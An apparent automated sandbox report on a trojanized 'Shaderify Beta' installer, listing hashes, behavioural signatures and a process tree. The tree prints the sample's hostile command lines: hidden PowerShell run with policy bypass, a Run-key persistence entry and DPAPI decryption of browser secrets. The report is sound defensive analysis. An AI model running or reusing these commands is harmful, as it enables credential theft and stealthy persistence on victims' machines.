Overview (score 8)
Static (score 3)
Tasks (sample, platform, score):
  Shaderify ....4.exe, windows7-x64, 8
  Shaderify ....4.exe, windows10-2004-x64, 8
  $PLUGINSDI...ls.dll, windows7-x64, 3
  $PLUGINSDI...ls.dll, windows10-2004-x64, 3
  $PLUGINSDI...em.dll, windows7-x64, 3
  $PLUGINSDI...em.dll, windows10-2004-x64, 3
  LICENSES.c...m.html, windows7-x64, 1
  LICENSES.c...m.html, windows10-2004-x64, 1
  ShaderifyBeta.exe, windows7-x64, 8
  ShaderifyBeta.exe, windows10-2004-x64, 8
  d3dcompiler_47.dll, windows10-2004-x64, 1
  ffmpeg.dll, windows7-x64, 1
  ffmpeg.dll, windows10-2004-x64, 1
  libEGL.dll, windows7-x64, 1
  libEGL.dll, windows10-2004-x64, 1
  libGLESv2.dll, windows7-x64, 1
  libGLESv2.dll, windows10-2004-x64, 1
  resources/app.js, windows7-x64, 3
  resources/app.js, windows10-2004-x64, 3
  resources/elevate.exe, windows7-x64, 1
  resources/elevate.exe, windows10-2004-x64, 1
  swiftshade...GL.dll, windows7-x64, 1
  swiftshade...GL.dll, windows10-2004-x64, 1
  swiftshade...v2.dll, windows7-x64, 1
  swiftshade...v2.dll, windows10-2004-x64, 1
  vk_swiftshader.dll, windows7-x64, 1
  vk_swiftshader.dll, windows10-2004-x64, 1
  vulkan-1.dll, windows7-x64, 1
  vulkan-1.dll, windows10-2004-x64, 1
  $PLUGINSDI...7z.dll, windows7-x64, 3
  $PLUGINSDI...7z.dll, windows10-2004-x64, 3
Analysis
- max time kernel: 149s
- max time network: 155s
- platform: windows10-2004_x64
- resource: win10v2004-20240426-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 03-06-2024 08:53
Static task
static1
Behavioral task
behavioral1
Sample
Shaderify Beta 8.4.4.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
Shaderify Beta 8.4.4.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/StdUtils.dll
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/StdUtils.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/System.dll
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/System.dll
Resource
win10v2004-20240426-en
Behavioral task
behavioral7
Sample
LICENSES.chromium.html
Resource
win7-20240508-en
Behavioral task
behavioral8
Sample
LICENSES.chromium.html
Resource
win10v2004-20240508-en
Behavioral task
behavioral9
Sample
ShaderifyBeta.exe
Resource
win7-20240508-en
Behavioral task
behavioral10
Sample
ShaderifyBeta.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral11
Sample
d3dcompiler_47.dll
Resource
win10v2004-20240426-en
Behavioral task
behavioral12
Sample
ffmpeg.dll
Resource
win7-20240221-en
Behavioral task
behavioral13
Sample
ffmpeg.dll
Resource
win10v2004-20240426-en
Behavioral task
behavioral14
Sample
libEGL.dll
Resource
win7-20240221-en
Behavioral task
behavioral15
Sample
libEGL.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral16
Sample
libGLESv2.dll
Resource
win7-20240508-en
Behavioral task
behavioral17
Sample
libGLESv2.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral18
Sample
resources/app.js
Resource
win7-20240508-en
Behavioral task
behavioral19
Sample
resources/app.js
Resource
win10v2004-20240508-en
Behavioral task
behavioral20
Sample
resources/elevate.exe
Resource
win7-20240221-en
Behavioral task
behavioral21
Sample
resources/elevate.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral22
Sample
swiftshader/libEGL.dll
Resource
win7-20231129-en
Behavioral task
behavioral23
Sample
swiftshader/libEGL.dll
Resource
win10v2004-20240226-en
Behavioral task
behavioral24
Sample
swiftshader/libGLESv2.dll
Resource
win7-20240221-en
Behavioral task
behavioral25
Sample
swiftshader/libGLESv2.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral26
Sample
vk_swiftshader.dll
Resource
win7-20240221-en
Behavioral task
behavioral27
Sample
vk_swiftshader.dll
Resource
win10v2004-20240426-en
Behavioral task
behavioral28
Sample
vulkan-1.dll
Resource
win7-20240221-en
Behavioral task
behavioral29
Sample
vulkan-1.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral30
Sample
$PLUGINSDIR/nsis7z.dll
Resource
win7-20240221-en
Behavioral task
behavioral31
Sample
$PLUGINSDIR/nsis7z.dll
Resource
win10v2004-20240508-en
General
- Target: ShaderifyBeta.exe
- Size: 120.4MB
- MD5: b9f8c41f3f567782a8dfc4a90f35163c
- SHA1: 89afe38e055b6fc96a36158bdca344fc73d9c659
- SHA256: 1ec5238c41c2f9655cee2b676a9c7a48821f624b1c59a4a4ac05583b21dd1458
- SHA512: 49d495b2bc6cdcc9a64d77560a92dc9e6377cba9892b23a9f3d79fa3f42b28635d87e96b20e2a8303238e8c8faaed6849210274a28fe65f6dcf24ca0c7cc52c3
- SSDEEP: 1572864:g1f0+Sva7Hdp1Nhn+aCdrvdYrZ/7/lbg8udR8SnuSE49z:Fasulbg8yTnbEOz
Malware Config
Signatures
- Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
  Run Powershell and hide display window.
- Checks computer location settings (2 TTPs, 1 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Processes:
    ShaderifyBeta.exe: Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation
- Loads dropped DLL (1 IoCs)
  Processes:
    ShaderifyBeta.exe (PID 4400)
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Adds Run key to start application (2 TTPs, 1 IoCs)
  Processes:
    powershell.exe: Set value (str) \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\cJuWbaEYwqGmdMS.ps1\""
- Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes:
    flow 15: ipapi.co
    flow 17: ipapi.co
- An obfuscated cmd.exe command-line is typically used to evade detection. (2 IoCs)
  Processes:
    cmd.exe (PID 5036), cmd.exe (PID 4092)
- Enumerates processes with tasklist (1 TTPs, 1 IoCs)
- Suspicious behavior: EnumeratesProcesses (12 IoCs)
  Processes:
    powershell.exe (PID 2788) x2, powershell.exe (PID 2420) x2, powershell.exe (PID 1344) x2, ShaderifyBeta.exe (PID 1252) x2, ShaderifyBeta.exe (PID 2740) x4
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Processes:
    tasklist.exe (PID 3636): Token: SeDebugPrivilege
    powershell.exe (PID 2788): Token: SeDebugPrivilege
    powershell.exe (PID 2420): Token: SeDebugPrivilege
    powershell.exe (PID 1344): Token: SeDebugPrivilege
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (source PID and process -> target PID and process, number of recorded writes):
    4400 ShaderifyBeta.exe -> 2724 cmd.exe (x2)
    4400 ShaderifyBeta.exe -> 3052 cmd.exe (x2)
    2724 cmd.exe -> 2788 powershell.exe (x2)
    3052 cmd.exe -> 3636 tasklist.exe (x2)
    2788 powershell.exe -> 424 csc.exe (x2)
    424 csc.exe -> 2040 cvtres.exe (x2)
    4400 ShaderifyBeta.exe -> 5036 cmd.exe (x2)
    5036 cmd.exe -> 2420 powershell.exe (x2)
    4400 ShaderifyBeta.exe -> 4092 cmd.exe (x2)
    4092 cmd.exe -> 1344 powershell.exe (x2)
    4400 ShaderifyBeta.exe -> 2272 ShaderifyBeta.exe (x40)
    4400 ShaderifyBeta.exe -> 1252 ShaderifyBeta.exe (x2)
    4400 ShaderifyBeta.exe -> 2740 ShaderifyBeta.exe (x2)
Processes (process tree; nesting shows parent/child)
- C:\Users\Admin\AppData\Local\Temp\ShaderifyBeta.exe (PID 4400)
  Command line: "C:\Users\Admin\AppData\Local\Temp\ShaderifyBeta.exe"
  Signatures: Checks computer location settings; Loads dropped DLL; Suspicious use of WriteProcessMemory
  - C:\Windows\system32\cmd.exe (PID 2724)
    Command line: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2788)
      Command line: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
      Signatures: Command and Scripting Interpreter: PowerShell; Adds Run key to start application; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (PID 424)
        Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rxqp5jle\rxqp5jle.cmdline"
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (PID 2040)
          Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES49AB.tmp" "c:\Users\Admin\AppData\Local\Temp\rxqp5jle\CSCE4340FD8C5CF418888524C9E3494AA8.TMP"
  - C:\Windows\system32\cmd.exe (PID 3052)
    Command line: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\tasklist.exe (PID 3636)
      Command line: tasklist
      Signatures: Enumerates processes with tasklist; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe (PID 5036)
    Command line: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,29,91,20,250,244,96,249,70,151,181,139,149,165,63,141,20,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,153,5,53,101,41,221,199,69,137,25,8,206,225,102,110,200,122,91,33,160,134,229,213,22,203,204,228,9,108,217,15,36,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,209,169,143,159,124,134,19,21,115,239,86,173,129,115,75,126,28,211,192,67,176,83,172,180,133,53,36,115,134,63,125,108,48,0,0,0,247,204,77,117,114,109,27,84,75,239,250,231,249,252,110,35,28,202,157,116,66,197,80,79,79,53,42,90,124,78,22,98,170,121,69,228,70,161,95,144,248,17,178,142,224,204,145,171,64,0,0,0,147,222,190,106,197,5,164,148,65,178,237,73,45,249,247,52,202,203,218,107,66,57,114,152,65,63,102,164,185,7,212,103,210,243,200,201,208,204,243,76,218,218,33,186,103,238,37,186,225,235,182,3,102,148,159,173,246,151,154,219,224,67,3,103), $null, 'CurrentUser')"
    Signatures: An obfuscated cmd.exe command-line is typically used to evade detection.; Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2420)
      Command line: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,29,91,20,250,244,96,249,70,151,181,139,149,165,63,141,20,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,153,5,53,101,41,221,199,69,137,25,8,206,225,102,110,200,122,91,33,160,134,229,213,22,203,204,228,9,108,217,15,36,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,209,169,143,159,124,134,19,21,115,239,86,173,129,115,75,126,28,211,192,67,176,83,172,180,133,53,36,115,134,63,125,108,48,0,0,0,247,204,77,117,114,109,27,84,75,239,250,231,249,252,110,35,28,202,157,116,66,197,80,79,79,53,42,90,124,78,22,98,170,121,69,228,70,161,95,144,248,17,178,142,224,204,145,171,64,0,0,0,147,222,190,106,197,5,164,148,65,178,237,73,45,249,247,52,202,203,218,107,66,57,114,152,65,63,102,164,185,7,212,103,210,243,200,201,208,204,243,76,218,218,33,186,103,238,37,186,225,235,182,3,102,148,159,173,246,151,154,219,224,67,3,103), $null, 'CurrentUser')
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe (PID 4092)
    Command line: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,29,91,20,250,244,96,249,70,151,181,139,149,165,63,141,20,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,79,171,147,34,242,140,11,144,120,220,207,24,1,221,227,169,44,203,106,123,198,62,79,112,151,240,97,129,25,0,50,145,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,32,55,196,118,8,60,34,118,98,67,63,99,6,38,147,168,170,66,7,134,227,81,225,238,7,185,77,116,227,246,218,58,48,0,0,0,78,190,62,86,160,155,76,226,24,98,1,99,171,202,6,173,38,116,115,17,183,57,67,52,104,15,151,198,177,138,154,219,128,136,105,37,238,1,157,221,171,183,164,115,48,229,49,214,64,0,0,0,125,51,56,187,118,74,244,13,72,110,208,133,201,236,145,223,199,106,152,47,227,46,94,245,9,105,158,218,74,107,44,139,41,14,192,86,33,57,145,152,112,35,146,122,237,245,61,79,197,152,91,113,187,28,240,193,73,96,252,159,90,120,136,138), $null, 'CurrentUser')"
    Signatures: An obfuscated cmd.exe command-line is typically used to evade detection.; Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1344)
      Command line: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,29,91,20,250,244,96,249,70,151,181,139,149,165,63,141,20,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,79,171,147,34,242,140,11,144,120,220,207,24,1,221,227,169,44,203,106,123,198,62,79,112,151,240,97,129,25,0,50,145,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,32,55,196,118,8,60,34,118,98,67,63,99,6,38,147,168,170,66,7,134,227,81,225,238,7,185,77,116,227,246,218,58,48,0,0,0,78,190,62,86,160,155,76,226,24,98,1,99,171,202,6,173,38,116,115,17,183,57,67,52,104,15,151,198,177,138,154,219,128,136,105,37,238,1,157,221,171,183,164,115,48,229,49,214,64,0,0,0,125,51,56,187,118,74,244,13,72,110,208,133,201,236,145,223,199,106,152,47,227,46,94,245,9,105,158,218,74,107,44,139,41,14,192,86,33,57,145,152,112,35,146,122,237,245,61,79,197,152,91,113,187,28,240,193,73,96,252,159,90,120,136,138), $null, 'CurrentUser')
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Users\Admin\AppData\Local\Temp\ShaderifyBeta.exe (PID 2272)
    Command line: "C:\Users\Admin\AppData\Local\Temp\ShaderifyBeta.exe" --type=gpu-process --field-trial-handle=1836,14204483464277005053,8560346771562735350,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1844 /prefetch:2
  - C:\Users\Admin\AppData\Local\Temp\ShaderifyBeta.exe (PID 1252)
    Command line: "C:\Users\Admin\AppData\Local\Temp\ShaderifyBeta.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1836,14204483464277005053,8560346771562735350,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2200 /prefetch:8
    Signatures: Suspicious behavior: EnumeratesProcesses
  - C:\Users\Admin\AppData\Local\Temp\ShaderifyBeta.exe (PID 2740)
    Command line: "C:\Users\Admin\AppData\Local\Temp\ShaderifyBeta.exe" --type=gpu-process --field-trial-handle=1836,14204483464277005053,8560346771562735350,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1872 /prefetch:2
    Signatures: Suspicious behavior: EnumeratesProcesses
- C:\Windows\System32\CompPkgSrv.exe (PID 640)
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 3KB
  MD5: 52cc110bb3777aa6bba7900630d4eb49
  SHA1: 3663dc658fd13d407e49781d1a5c2aa203c252fc
  SHA256: 892a9edb03db3fd88fecc1e1a2f56a7339f16f6734e8d77e6538ea2c8c9026d6
  SHA512: 89b80d2783e902d68ffd08b6f3fb1848ae6e6c4bf2d7a1e4afdac970b2ee6ffcc58116cdd6234e3d6278eb9413d36aafe62b5beca24a0846575d12af0c5112ab
- Filesize: 3KB
  MD5: f48896adf9a23882050cdff97f610a7f
  SHA1: 4c5a610df62834d43f470cae7e851946530e3086
  SHA256: 3ae35c2828715a2f9a5531d334a0cfffc81396c2dc058ca42a9943f3cdc22e78
  SHA512: 16644246f2a35a186fcb5c2b6456ed6a16e8db65ad1383109e06547f9b1f9358f071c30cca541ca4cf7bae66cb534535e88f75f6296a4bfc6c7b22b0684a6ba9
- Filesize: 1KB
  MD5: 68d80cc2ac40ea9e5c7297fba6623c45
  SHA1: 05908daef7414f753fa6006082c42485002a7da8
  SHA256: 3b059d656dae93233a96c9079352c1d77c6abfec689cc6236b93b427c9918e96
  SHA512: 2c51e963eba030ee4f2ef5df1577a8ce38cacd6ffc3d0c56258db173352b46cd6048505061c65bd5757d14e2e27d9d396cbce95d58406660af62365bd4e7afb6
- Filesize: 22B
  MD5: 76cdb2bad9582d23c1f6f4d868218d6c
  SHA1: b04f3ee8f5e43fa3b162981b50bb72fe1acabb33
  SHA256: 8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85
  SHA512: 5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f
- Filesize: 1KB
  MD5: 7b1c2af8ddbcd4c3363b180262abd7d0
  SHA1: 5e8c5227748093c40d64e0717607acdbdd29b9b7
  SHA256: 9f053ba56308492806f15ca87db1b336dee056f534bf4ee806c1897d29402299
  SHA512: f18afa42c832983ddb5a53e5a451d477d82b5e6d9ef6c17109b3c64baaef310347b1413f0142e63d8d72dd05eec815ceecf75b1654b3027ec4a915a5b5e851c1
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- Filesize: 1.4MB
  MD5: 56192831a7f808874207ba593f464415
  SHA1: e0c18c72a62692d856da1f8988b0bc9c8088d2aa
  SHA256: 6aa8763714aa5199a4065259af792292c2a7d6a2c381aa27007255421e5c9d8c
  SHA512: c82aa1ef569c232b4b4f98a3789f2390e5f7bf5cc7e73d199fe23a3f636817edfdc2fb49ce7f69169c028a9dd5ab9f63e8f64964bb22424fc08db71e85054a33
- Filesize: 3KB
  MD5: 7d368ef8c4c56efa9547e63e4ec515aa
  SHA1: 46f3516cfdadca41f878994f5133fca64665dc5e
  SHA256: e924c2bd8e16474bf12f3bd3ac611dd3d9f5ea001b86dd5e52a9f96d384bc749
  SHA512: e57471f84847dafbd6f95702b0fb5f21d6ae8a8eaea30a735e59ec5a3e10f83ee481b646c61a6d3088a44536406d1222493ebbc4ddbe8c43b296586fd69bd52e
- Filesize: 652B
  MD5: ccbf1e6bddb19b391dabbb5c8ebbdb01
  SHA1: 8c1fe2349bea8bcf3542bf5a30627960ce9f807f
  SHA256: d75d83eb8f467390c5c2f9245a62b617786e55f5a0a3815ab2e4e73dc752737a
  SHA512: 7136016be56afb67ff3d4934db4cc1ec3fc141c2bd5d76c49fff625773d5f84f34db9993a53cc9483b237758f03c1791edb53956924fc1fb8164158edcf800d0
- Filesize: 426B
  MD5: b462a7b0998b386a2047c941506f7c1b
  SHA1: 61e8aa007164305a51fa2f1cebaf3f8e60a6a59f
  SHA256: a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35
  SHA512: eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020
- Filesize: 369B
  MD5: 18a339e346aa61df6906b165ebceac0d
  SHA1: d4a60b888c0e2e8c9d77a79ce22e3e56e09e400c
  SHA256: 11eb4bfaefce360800f256c97e0edef53de240e0cfd84d10982fbd84795ad20d
  SHA512: 8df662c72e3f1f94e0ddff509d334e007935777043297270351c39a1f203bfb1c6652dd81d67f5b4652940a79ee97d0ba3cc78657f30a5189291739c05030891